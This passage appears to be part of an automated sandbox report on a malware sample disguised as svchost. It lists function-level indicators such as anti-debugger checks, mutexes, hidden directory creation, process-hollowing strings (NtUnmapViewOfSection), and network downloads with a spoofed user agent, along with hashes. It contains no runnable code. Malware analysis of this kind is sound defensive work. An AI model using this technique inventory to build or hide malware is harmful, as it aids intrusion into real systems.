                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction ID: 2b7a49ae12585387fd1774c197e326953d3097cb79c651694dbb1f5c8a5f44d1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9901AD2B91CA4282EB20DB51EC5822A6761FBFCF55FB40531F94EC6674CE3DD58DA600
                                                                                                                                                                                                                        Function 00007FF67E6D3FC4 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction ID: 1ea8021c8d57910f189ec96275741a4f074e856851a4a6f2e1d6f4416716fa7a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4011F47661C68681EB70DB11E44C36B6360FBA4754F704235E69D86598DF3DD908EB00
                                                                                                                                                                                                                        Function 00007FF67E6D3704 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction ID: 853da2a6e06a3e367eefb625b0123b65742e5ba69aa7f15c3812f358d009c2ee
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D31D82662C6C186DB30DB64E4983ABB3A0FBA4704FA01136E68DC7A58DF7DD509DB04
                                                                                                                                                                                                                        Function 00007FF67E6D2FFC Relevance: 4.5, APIs: 3, Instructions: 24sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateMutex$CloseHandleObjectReleaseSingleSleepThreadWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2668954219-0
                                                                                                                                                                                                                        • Opcode ID: 338863262be518143d30d6df13cd78e4dfbfeb4ba058323c8d8fa4bdfeb9f528
                                                                                                                                                                                                                        • Instruction ID: d185769b4ad46a3862db5ef931cc8cbab772b3db15b48b08c1871310d20f227d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 338863262be518143d30d6df13cd78e4dfbfeb4ba058323c8d8fa4bdfeb9f528
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BF0902692878286EB50DB21A80932726A1AFA9754FB01134F59E86694CF3CD00D9700
                                                                                                                                                                                                                        Function 00007FF67E6D31AC Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction ID: 3d13ff900ad75127a6441b7d3201e4fc5f862062e98e586352c89933aabb9caf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAF03A2B95C283C1EE309B65AC0C32B37A0BB65B08FB40174F58D8A694CF2CD50DEA11
                                                                                                                                                                                                                        Function 00007FF67E6D41E4 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4294037311-0
                                                                                                                                                                                                                        • Opcode ID: bf3485979edfa6433492db17b946e1c3c98b3791ee27d21d87cd92ad9d6d8dc2
                                                                                                                                                                                                                        • Instruction ID: dcc756484d8647ef2a0de95fac98ddcb1e70e8aba1de976e6174be8d1ef75e18
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3485979edfa6433492db17b946e1c3c98b3791ee27d21d87cd92ad9d6d8dc2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62F0302A92C64282EE60DB60F44837F2360FBB5701FB01475F98E82A54CF3DD80DB600
                                                                                                                                                                                                                        Function 00007FF67E6D329C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29threadCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4524: CreateFileW.KERNELBASE ref: 00007FF67E6D456B
                                                                                                                                                                                                                        • CreateThread.KERNELBASE ref: 00007FF67E6D3326
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D10D8: OpenProcess.KERNEL32 ref: 00007FF67E6D10FC
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Create$File$AttributesDirectoryFolderOpenPathProcessThread
                                                                                                                                                                                                                        • String ID: .x64
                                                                                                                                                                                                                        • API String ID: 60358384-2481150777
                                                                                                                                                                                                                        • Opcode ID: f8b4fc7db0bf2bbe663ef769caf0c35b860265a468429492d6d04322976fb1bc
                                                                                                                                                                                                                        • Instruction ID: 5495f5019ff015011afe659f327099d27eca47df753016d21830f32f84e96a81
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8b4fc7db0bf2bbe663ef769caf0c35b860265a468429492d6d04322976fb1bc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94010C2AA7854281EF90EB21E9497AB6290AFB4B44FF05035F00DCA165CE3CE80DA700
                                                                                                                                                                                                                        Function 00007FF67E6D14EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 436 7ff67e6d14ec-7ff67e6d1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF67E6D15F1,?,?,?,?,?,?,?,?,00007FF67E6D3418), ref: 00007FF67E6D14FF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF67E6D15F1,?,?,?,?,?,?,?,?,00007FF67E6D3418), ref: 00007FF67E6D1514
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: fcc9240df0fb9f1d8cd1eb24de5cde03531050d7ff1e9ad230f47a91af112976
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0E00277518F85C6CA20DB15F84411AB7B4FBD9B94FA04125EACD86B28DF3CC569CB04
                                                                                                                                                                                                                        Function 00007FF67E6D1444 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 437 7ff67e6d1444-7ff67e6d1476 GetSystemInfo 438 7ff67e6d1481-7ff67e6d1488 437->438 439 7ff67e6d1478-7ff67e6d147d 437->439 441 7ff67e6d1491 438->441 442 7ff67e6d148a-7ff67e6d148f 438->442 440 7ff67e6d1493-7ff67e6d1498 439->440 441->440 442->440 442->441
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                        • Opcode ID: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction ID: 15d728e4ece59671652d2351f1f050e760d5396f0d8c0df5468deaa0c57143aa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51E065A7A2C04182FB708730E51433B62E1F764B44FF00535FA8DC26D4EE6CCA449B40
                                                                                                                                                                                                                        Function 00007FF67E6D317C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Sleep$CreateObjectSingleThreadWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2604865191-0
                                                                                                                                                                                                                        • Opcode ID: 734b4daac9faf042d12da8b8d35537129b69a461801daf7e9e59510d65147352
                                                                                                                                                                                                                        • Instruction ID: c32aa799b805eae31564c51920e9fbcf3e7577fd13e5aafe123279779a29f9e7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 734b4daac9faf042d12da8b8d35537129b69a461801daf7e9e59510d65147352
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4D0122AEBC193D1EA58F7719C4D07B21A1AB65300FF00834F149C01D0CD1C959DA620
                                                                                                                                                                                                                        Function 00007FF67E6D3AE4 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction ID: d095f3c1f1a73f8ffe93f43e00f821102022430ebd7877c164c91335c3b53f09
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3D0C926E3898281EA94DB27E88971A66A0FBD5B44FA08035E68981564CE3CC19D8B00

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF67E6D24CC Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction ID: f554afc5acd634f3db668d1ad3a52dd278edc5174fb00b6f6e2a06159504dd0a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0632E836618AC186EB70CB16E8547ABB3A1FBD8B45F604135EA8DC7B58DF3CD4489B00
                                                                                                                                                                                                                        Function 00007FF67E6D2160 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF67E6D219D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction ID: 2b32a375a4482d0675828a968cdecbe0872464312e8fe941e07237350959be8a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5771DE36528A82C2EB50CB55F85872BB761FBD4B94F705035F68A87A68CF7CD4489B40
